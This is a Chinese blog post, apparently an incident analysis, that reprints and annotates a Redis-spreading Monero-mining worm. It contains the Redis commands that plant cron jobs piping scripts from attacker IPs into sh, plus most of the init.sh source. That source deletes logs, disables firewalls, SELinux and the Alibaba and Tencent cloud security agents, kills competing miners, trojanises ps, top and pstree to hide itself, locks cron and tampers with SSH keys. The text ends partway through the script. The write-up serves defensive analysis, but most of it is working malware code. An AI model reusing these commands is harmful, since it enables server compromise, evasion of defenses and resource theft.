网站快照劫持代码-快照删除-黑帽SEO本文是接上一篇《记录一次 Redis 6379 被黑攻击 被设置主从同步和挖矿门罗币》继续分析黑客脚本,复现黑客如何利用 Redis 未授权访问漏洞拿到 shell 执行挖矿的。
cleanfda 脚本概述
此木马脚本分为三个部分:init.sh、is.sh、rs.sh,首先黑客拿到我们的 Redis 链接,因为没有密码直接就连接到了 Redis,然后利用 Redis 未授权访问漏洞执行 Redis 命令:
config set stop-writes-on-bgsave-error no
flushall
set backup1 \"\\n\\n\\n*/2 * * * * cd1 -fsSL http://195.58.39.46/cleanfda/init.sh | sh\\n\\n\"
set backup2 \"\\n\\n\\n*/3 * * * * wget -q -O- http://195.58.39.46/cleanfda/init.sh | sh\\n\\n\"
set backup3 \"\\n\\n\\n*/4 * * * * curl -fsSL http://45.133.203.192/cleanfda/init.sh | sh\\n\\n\"
set backup4 \"\\n\\n\\n*/5 * * * * wd1 -q -O- http://45.133.203.192/cleanfda/init.sh | sh\\n\\n\"
config set dir \"/var/spool/cron/\"
config set dbfilename \"root\"
save
config set dir \"/var/spool/cron/crontabs\"
save
flushall
set backup1 \"\\n\\n\\n*/2 * * * * root cd1 -fsSL http://195.58.39.46/cleanfda/init.sh | sh\\n\\n\"
set backup2 \"\\n\\n\\n*/3 * * * * root wget -q -O- http://195.58.39.46/cleanfda/init.sh | sh\\n\\n\"
set backup3 \"\\n\\n\\n*/4 * * * * root curl -fsSL http://45.133.203.192/cleanfda/init.sh | sh\\n\\n\"
set backup4 \"\\n\\n\\n*/5 * * * * root wd1 -q -O- http://45.133.203.192/cleanfda/init.sh | sh\\n\\n\"
config set dir \"/etc/cron.d/\"
config set dbfilename \"zzh\"
save
config set dir \"/etc/\"
config set dbfilename \"crontab\"
save
config set dir \"/var/spool/cron/\"
config set dbfilename \"root\"
save这样就将定时任务和脚本注入到了我们机器当中,就会开始执行 init.sh 脚本
init.sh 主要功能是:关闭selinux、杀掉别人的挖矿进程、杀掉CPU占用过高的进程,如果是自己就跳过、修改破坏系统命令、自己造一个下载器downloads()函数、解锁和加锁定时任务、添加挖矿技术任务、设置SSH免密登陆、下载执行矿机挖矿程序、关闭防火墙、清除日志、感染已知的免密机器、下载执行is.sh。
is.sh 主要功能是:下载masscan扫描器、下载pnscan扫描器、安装 redis 用于创建 redis 未授权访问的漏洞、执行 rs.sh。
rs.sh 主要功能是:开放 6379 端口、自动化利用redis未授权写入定时任务、利用 pnscan 扫描b段IP 6379 端口、利用 masscan 进行扫描端口。
下面是黑客的脚本原文,我进行了注解。
init.sh
#!/bin/sh
# 修改系统打开文件最大数
ulimit -n 65535
## 删除日志
rm -rf /var/log/syslog
chmod 777 /usr/bin/chattr
chmod 777 /bin/chattr
chattr -iua /tmp/
chattr -iua /var/tmp/
# 关闭防火墙
ufw disable
iptables -F
sysctl kernel.nmi_watchdog=0
echo \'0\' >/proc/sys/kernel/nmi_watchdog
echo \'kernel.nmi_watchdog=0\' >>/etc/sysctl.conf
chattr -iae /root/.ssh/
chattr -iae /root/.ssh/authorized_keys
rm -rf /tmp/addres*
rm -rf /tmp/walle*
rm -rf /tmp/keys
# 开始对原始命令进行改名破坏
crondir=\'/var/spool/cron/\'\"$USER\"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/zzhs
rtdir=\"/etc/zzhs\"
bbdir=\"/usr/bin/curl\"
bbdira=\"/usr/bin/cd1\"
ccdir=\"/usr/bin/wget\"
ccdira=\"/usr/bin/wd1\"
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/wgettnt /usr/bin/wd1
mv /usr/bin/curltnt /usr/bin/cd1
mv /usr/bin/url /usr/bin/cd1
mv /usr/bin/cur /usr/bin/cd1
mv /usr/bin/cdl /usr/bin/cd1
mv /usr/bin/cdt /usr/bin/cd1
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/xget /usr/bin/get
mv /usr/bin/get /usr/bin/wd1
mv /usr/bin/wge /usr/bin/wd1
mv /usr/bin/wdl /usr/bin/wd1
mv /usr/bin/wdt /usr/bin/wd1
# 此处干掉阿里云的云盾
if ps aux | grep -i \'[a]liyun\'; then
$bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash
$bbdir http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
$bbdira http://update.aegis.aliyun.com/download/uninstall.sh | bash
$bbdira http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i \'[y]unjing\'; then
# 此处干掉腾讯云的云镜
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
# 关闭selinux
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep \'aegis\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'Yun\' | awk \'{print $2}\' | xargs -I % kill -9 %
rm -rf /usr/local/aegis
rm -f /tmp/.null 2>/dev/null
miner_url=\"http://45.133.203.192/cleanfda/zzh\"
miner_url_backup=\"http://py2web.store/cleanfda/zzh\"
miner_size=\"6006304\"
sh_url=\"http://45.133.203.192/cleanfda/newinit.sh\"
sh_url_backup=\"http://py2web.store/cleanfda/newinit.sh\"
chattr_size=\"8000\"
sleep 1
if [ -x \"$(command -v apt-get)\" ]; then
export DEBIAN_FRONTEND=noninteractive
apt-get install -y unhide
apt-get install -y gawk
fi
if [ -x \"$(command -v yum)\" ]; then
yum install -y epel-release
yum install -y unhide
yum install -y gawk
fi
sleep 1
dddir=\"/usr/sbin/unhide\"
$dddir quick |grep PID:|awk \'{print $4}\'|xargs -I % kill -9 % 2>/dev/null
sleep 1
if [ -x \"$(command -v t)\" ]; then
mv /usr/bin/t /usr/bin/chattr
fi
if [ -x \"$(command -v chattr)\" ]; then
chattr -i /usr/bin/ip6network
chattr -i /usr/bin/kswaped
chattr -i /usr/bin/irqbalanced
chattr -i /usr/bin/rctlcli
chattr -i /usr/bin/systemd-network
chattr -i /usr/bin/pamdicks
echo 1 > /usr/bin/ip6network
echo 2 > /usr/bin/kswaped
echo 3 > /usr/bin/irqbalanced
echo 4 > /usr/bin/rctlcli
echo 5 > /usr/bin/systemd-network
echo 6 > /usr/bin/pamdicks
chattr +i /usr/bin/ip6network
chattr +i /usr/bin/kswaped
chattr +i /usr/bin/irqbalanced
chattr +i /usr/bin/rctlcli
chattr +i /usr/bin/systemd-network
chattr +i /usr/bin/pamdicks
fi
sleep 1
# 杀掉别人挖矿的进程
kill_miner_proc()
{
netstat -anp | grep 185.71.65.238 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | xargs -I % kill -9 %
netstat -anp | grep 140.82.52.87 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | xargs -I % kill -9 %
netstat -anp | grep :443 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | grep -v \"-\" | xargs -I % kill -9 %
netstat -anp | grep :23 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | grep -v \"-\" | xargs -I % kill -9 %
netstat -anp | grep :443 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | grep -v \"-\" | xargs -I % kill -9 %
netstat -anp | grep :143 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | grep -v \"-\" | xargs -I % kill -9 %
netstat -anp | grep :2222 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | grep -v \"-\" | xargs -I % kill -9 %
netstat -anp | grep :3333 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | grep -v \"-\" | xargs -I % kill -9 %
netstat -anp | grep :3389 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | grep -v \"-\" | xargs -I % kill -9 %
netstat -anp | grep :5555 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | grep -v \"-\" | xargs -I % kill -9 %
netstat -anp | grep :6666 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | grep -v \"-\" | xargs -I % kill -9 %
netstat -anp | grep :6665 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | grep -v \"-\" | xargs -I % kill -9 %
netstat -anp | grep :6667 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | grep -v \"-\" | xargs -I % kill -9 %
netstat -anp | grep :7777 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | grep -v \"-\" | xargs -I % kill -9 %
netstat -anp | grep :8444 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | grep -v \"-\" | xargs -I % kill -9 %
netstat -anp | grep :3347 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | grep -v \"-\" | xargs -I % kill -9 %
netstat -anp | grep :10008 | awk \'{print $7}\' | awk -F\'[/]\' \'{print $1}\' | grep -v \"-\" | xargs -I % kill -9 %
ps aux | grep -v grep | grep \':3333\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \':5555\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'kworker -c\\\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'log_\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'systemten\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'netns\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'voltuned\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'darwin\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'/tmp/dl\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'/tmp/ddg\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'/tmp/pprt\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'/tmp/ppol\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'/tmp/65ccE*\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'/tmp/jmx*\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'/tmp/2Ne80*\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'IOFoqIgyC0zmf2UR\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'45.76.122.92\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'51.38.191.178\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'51.15.56.161\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'86s.jpg\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'aGTSGJJp\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'nMrfmnRa\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'PuNY5tm2\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'I0r8Jyyt\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'AgdgACUD\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'uiZvwxG8\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'hahwNEdB\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'BtwXn5qH\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'3XEzey2T\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'t2tKrCSZ\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'HD7fcBgg\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'zXcDajSs\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'3lmigMo\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'AkMK4A2\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'AJ2AkKe\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'HiPxCJRS\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'http_0xCC030\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'http_0xCC031\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'http_0xCC032\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'http_0xCC033\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"C4iLM4L\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'aziplcr72qjhzvin\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | awk \'{ if(substr($11,1,2)==\"./\" && substr($12,1,2)==\"./\") print $2 }\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'/boot/vmlinuz\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"i4b503a52cc5\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"dgqtrcst23rtdi3ldqk322j2\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"2g0uv7npuhrlatd\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"nqscheduler\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"rkebbwgqpl4npmm\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep \"]\" | awk \'$3>10.0{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"2fhtu70teuhtoh78jc5s\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"0kwti6ut420t\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"44ct7udt0patws3agkdfqnjm\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v \"/\" | grep -v \"-\" | grep -v \"_\" | awk \'length($11)>19{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"\\[^\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"rsync\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"watchd0g\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | egrep \'wnTKYg|2t3ik|qW3xT.2|ddg\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"158.69.133.18:8220\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"/tmp/java\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'gitee.com\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'/tmp/java\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'104.248.4.162\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'89.35.39.78\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'/dev/shm/z3.sh\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'kthrotlds\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'ksoftirqds\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'netdns\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'watchdogs\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'kdevtmpfsi\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'kinsing\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'redis2\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep \" ps\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"sync_supers\" | cut -c 9-15 | xargs -I % kill -9 %
ps aux | grep -v grep | grep \"cpuset\" | cut -c 9-15 | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep \"x]\" | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep \"sh] /tmp/kdevtmpfsi
chattr +i /tmp/kdevtmpfsi
sleep 1
chattr -i /usr/lib/systemd/systemd-update-daily
echo 1 > /usr/lib/systemd/systemd-update-daily
chattr +i /usr/lib/systemd/systemd-update-daily
>/tmp/svcupdate
>/tmp/svcguard
>/etc/svcupdate
>/etc/svcguard
>/etc/cron.daily/logrotate
>/etc/cron.hourly/0anacron
>/etc/rc.d/rc.local
#yum install -y docker.io || apt-get install docker.io;
docker ps | grep \"pocosow\" | awk \'{print $1}\' | xargs -I % docker kill %
docker ps | grep \"gakeaws\" | awk \'{print $1}\' | xargs -I % docker kill %
docker ps | grep \"azulu\" | awk \'{print $1}\' | xargs -I % docker kill %
docker ps | grep \"auto\" | awk \'{print $1}\' | xargs -I % docker kill %
docker ps | grep \"xmr\" | awk \'{print $1}\' | xargs -I % docker kill %
docker ps | grep \"mine\" | awk \'{print $1}\' | xargs -I % docker kill %
docker ps | grep \"slowhttp\" | awk \'{print $1}\' | xargs -I % docker kill %
docker ps | grep \"bash.shell\" | awk \'{print $1}\' | xargs -I % docker kill %
docker ps | grep \"entrypoint.sh\" | awk \'{print $1}\' | xargs -I % docker kill %
docker ps | grep \"/var/sbin/bash\" | awk \'{print $1}\' | xargs -I % docker kill %
docker images -a | grep \"pocosow\" | awk \'{print $3}\' | xargs -I % docker rmi -f %
docker images -a | grep \"gakeaws\" | awk \'{print $3}\' | xargs -I % docker rmi -f %
docker images -a | grep \"buster-slim\" | awk \'{print $3}\' | xargs -I % docker rmi -f %
docker images -a | grep \"hello-\" | awk \'{print $3}\' | xargs -I % docker rmi -f %
docker images -a | grep \"azulu\" | awk \'{print $3}\' | xargs -I % docker rmi -f %
docker images -a | grep \"registry\" | awk \'{print $3}\' | xargs -I % docker rmi -f %
docker images -a | grep \"xmr\" | awk \'{print $3}\' | xargs -I % docker rmi -f %
docker images -a | grep \"auto\" | awk \'{print $3}\' | xargs -I % docker rmi -f %
docker images -a | grep \"mine\" | awk \'{print $3}\' | xargs -I % docker rmi -f %
docker images -a | grep \"monero\" | awk \'{print $3}\' | xargs -I % docker rmi -f %
docker images -a | grep \"slowhttp\" | awk \'{print $3}\' | xargs -I % docker rmi -f %
#echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep \'aegis\' | awk \'{print $2}\' | xargs -I % kill -9 %
ps aux | grep -v grep | grep \'Yun\' | awk \'{print $2}\' | xargs -I % kill -9 %
rm -rf /usr/local/aegis
chattr -R -ia /var/spool/cron
chattr -ia /etc/crontab
chattr -R -ia /etc/cron.d
chattr -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontab
}
kill_miner_proc
# 杀掉CPU占用过高的进程,如果是zzh自己人就放过
kill_sus_proc()
{
ps axf -o \"pid\"|while read procid
do
ls -l /proc/$procid/exe | grep /tmp
if [ $? -ne 1 ]
then
cat /proc/$procid/cmdline| grep -a -E \"zzh\"
if [ $? -ne 0 ]
then
kill -9 $procid
else
echo \"don\'t kill\"
fi
fi
done
ps axf -o \"pid %cpu\" | awk \'{if($2>=40.0) print $1}\' | while read procid
do
cat /proc/$procid/cmdline| grep -a -E \"zzh\"
if [ $? -ne 0 ]
then
kill -9 $procid
else
echo \"don\'t kill\"
fi
done
}
kill_sus_proc
nameserver(){
grep -q 1.1.1.1 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo \"nameserver 1.1.1.1\" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null
}
nameserver
fuckyou(){
$(docker rm $(docker ps | grep -v grep | grep \"/root/startup.sh\" | awk \'{print $1}\') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep \"widoc26117/xmr\" | awk \'{print $1}\') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep \"zbrtgwlxz\" | awk \'{print $1}\') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep \"tail -f /dev/null\" | awk \'{print $1}\') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep \"/usr/bin/supervisor…\" | awk \'{print $1}\') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep \"/app/BitLockerServi…\" | awk \'{print $1}\') -f 2>/dev/null 1>/dev/null)
rm -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null
pkill -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null
rm -fr /tmp/moneroocean/ 2>/dev/null 1>/dev/null
killall -9 xmrig 2>/dev/null 1>/dev/null
if [ -f /root/.tmp/xmrig ]; then
chattr -iR /root/.tmp/ 2>/dev/null 1>/dev/null
tmpxmrigfile=\"/root/.tmp/miner.sh\"
rm -f $tmpxmrigfile 2>/dev/null 1>/dev/null
pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null
kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null
chmod +x $tmpxmrigfile 2>/dev/null 1>/dev/null
chattr +i $tmpxmrigfile 2>/dev/null 1>/dev/null
pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null
kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null
killall $tmpxmrigfile 2>/dev/null 1>/dev/null
chmod -x /root/.tmp/xmrig 2>/dev/null 1>/dev/null
rm -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null
chattr +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null
pkill -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null
ps ax| grep xmrig 2>/dev/null 1>/dev/null
fi
BASH00=$(ps ax | grep -v grep | grep \"/root/.tmp00/bash\")
if [ ! -z \"$BASH00\" ];
then
chattr -i /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod 1777 /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod -x /var/spool/cron/root 2>/dev/null 1>/dev/null
echo \" \" > /var/spool/cron/root 2>/dev/null 1>/dev/null
rm -f /var/spool/cron/root 2>/dev/null 1>/dev/null
chattr -i /root/.tmp00/bash 2>/dev/null 1>/dev/null
chmod -x /root/.tmp00/bash 2>/dev/null 1>/dev/null
pkill -f /root/.tmp00/bash 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep \"/root/.tmp00/bash\" | awk \'{print $1}\') 2>/dev/null 1>/dev/null
kill $(pidof /root/.tmp00/bash) 2>/dev/null 1>/dev/null
echo \" \" > /root/.tmp00/bash 2>/dev/null 1>/dev/null
rm -f /root/.tmp00/bash 2>/dev/null 1>/dev/null
echo \"fuckyou\" > /root/.tmp00/bash
chattr +i /root/.tmp00/bash 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
fi
KINSING1=$(ps ax | grep -v grep | grep \"/var/tmp/kinsing\")
if [ ! -z \"$KINSING1\" ];
then
chattr -i /var/tmp/kinsing 2>/dev/null 1>/dev/null
chmod -x /var/tmp/kinsing 2>/dev/null 1>/dev/null
pkill -f /var/tmp/kinsing 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep \"/var/tmp/kinsing\" | awk \'{print $1}\') 2>/dev/null 1>/dev/null
kill $(pidof /var/tmp/kinsing) 2>/dev/null 1>/dev/null
echo \" \" > /var/tmp/kinsing 2>/dev/null 1>/dev/null
rm -f /var/tmp/kinsing 2>/dev/null 1>/dev/null
echo \"fuckyou\" > /var/tmp/kinsing
chattr +i /var/tmp/kinsing 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
fi
KINSING2=$(ps ax | grep -v grep | grep \"/tmp/kdevtmpfsi\")
if [ ! -z \"$KINSING2\" ];
then
chattr -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
chmod -x /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
pkill -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep \"/tmp/kdevtmpfsi\" | awk \'{print $1}\') 2>/dev/null 1>/dev/null
kill $(pidof /tmp/kdevtmpfsi) 2>/dev/null 1>/dev/null
echo \" \" > /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
rm -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
echo \"fuckyou\" > /tmp/kdevtmpfsi
chattr +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
fi
}
fuckyou
# 下载函数,通过重命名后的命令(cd1、wd1)下载
downloads()
{
if [ -f \"/usr/bin/curl\" ]
then
echo $1,$2
http_code=`curl -I -m 50 -o /dev/null -s -w %{http_code} $1`
if [ \"$http_code\" -eq \"200\" ]
then
curl --connect-timeout 100 --retry 100 $1 > $2
elif [ \"$http_code\" -eq \"405\" ]
then
curl --connect-timeout 100 --retry 100 $1 > $2
else
curl --connect-timeout 100 --retry 100 $3 > $2
fi
elif [ -f \"/usr/bin/cd1\" ]
then
http_code=`cd1 -I -m 50 -o /dev/null -s -w %{http_code} $1`
if [ \"$http_code\" -eq \"200\" ]
then
cd1 --connect-timeout 100 --retry 100 $1 > $2
elif [ \"$http_code\" -eq \"405\" ]
then
cd1 --connect-timeout 100 --retry 100 $1 > $2
else
cd1 --connect-timeout 100 --retry 100 $3 > $2
fi
elif [ -f \"/usr/bin/wget\" ]
then
wget --timeout=50 --tries=100 -O $2 $1
if [ $? -ne 0 ]
then
wget --timeout=100 --tries=100 -O $2 $3
fi
elif [ -f \"/usr/bin/wd1\" ]
then
wd1 --timeout=100 --tries=100 -O $2 $1
if [ $? -eq 0 ]
then
wd1 --timeout=100 --tries=100 -O $2 $3
fi
fi
}
# 解锁定时任务
unlock_cron()
{
chattr -R -ia /var/spool/cron
chattr -ia /etc/crontab
chattr -R -ia /var/spool/cron/crontabs
chattr -R -ia /etc/cron.d
}
# 定时任务上锁
lock_cron()
{
chattr -R +ia /var/spool/cron
chattr +ia /etc/crontab
chattr -R +ia /var/spool/cron/crontabs
chattr -R +ia /etc/cron.d
}
# 判断是是否为root目录
if [ -f \"$rtdir\" ]
then
echo \"i am root\"
mkdir -p /root/.ssh
echo \"goto 1\" >> /etc/zzhs
chattr -ia /etc/zzh*
chattr -ia /etc/newinit.sh*
chattr -ia /root/.ssh/authorized_keys*
chattr -R -ia /root/.ssh
# 更改ps top pstree 命令 过滤掉zzh和pnscan
if [ -f \"/bin/ps.original\" ]
then
echo \"/bin/ps changed\"
else
mv /bin/ps /bin/ps.original
echo \"#! /bin/bash\">>/bin/ps
echo \"ps.original \\$@ | grep -v \\\"zzh\\|pnscan\\\"\">>/bin/ps
chmod +x /bin/ps
touch -d 20160825 /bin/ps
echo \"/bin/ps changing\"
fi
if [ -f \"/bin/top.original\" ]
then
echo \"/bin/top changed\"
else
mv /bin/top /bin/top.original
echo \"#! /bin/bash\">>/bin/top
echo \"top.original \\$@ | grep -v \\\"zzh\\|pnscan\\\"\">>/bin/top
chmod +x /bin/top
touch -d 20160825 /bin/top
echo \"/bin/top changing\"
fi
if [ -f \"/bin/pstree.original\" ]
then
echo \"/bin/pstree changed\"
else
mv /bin/pstree /bin/pstree.original
echo \"#! /bin/bash\">>/bin/pstree
echo \"pstree.original \\$@ | grep -v \\\"zzh\\|pnscan\\\"\">>/bin/pstree
chmod +x /bin/pstree
touch -d 20160825 /bin/pstree
echo \"/bin/pstree changing\"
fi
if [ -f \"/bin/chattr\" ]
then
chattrsize=`ls -l /bin/chattr | awk \'{ print $5 }\'`
if [ \"$chattrsize\" -lt \"$chattr_size\" ]
then
yum -y remove e2fsprogs
yum -y install e2fsprogs
else
echo \"no need install chattr\"
fi
else
yum -y remove e2fsprogs
yum -y install e2fsprogs
fi
# 添加挖矿初始化程序计划任务
unlock_cron
rm -f ${crondir}
rm -f /etc/cron.d/zzh
rm -f /etc/crontab
echo \"*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1\" >> ${crondir}
echo \"*/40 * * * * root sh /etc/newinit.sh >/dev/null 2>&1\" >> /etc/cron.d/zzh
echo \"0 1 * * * root sh /etc/newinit.sh >/dev/null 2>&1\" >> /etc/crontab
echo crontab created
lock_cron
# 做SSH免密登陆
chmod 700 /root/.ssh/
echo >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
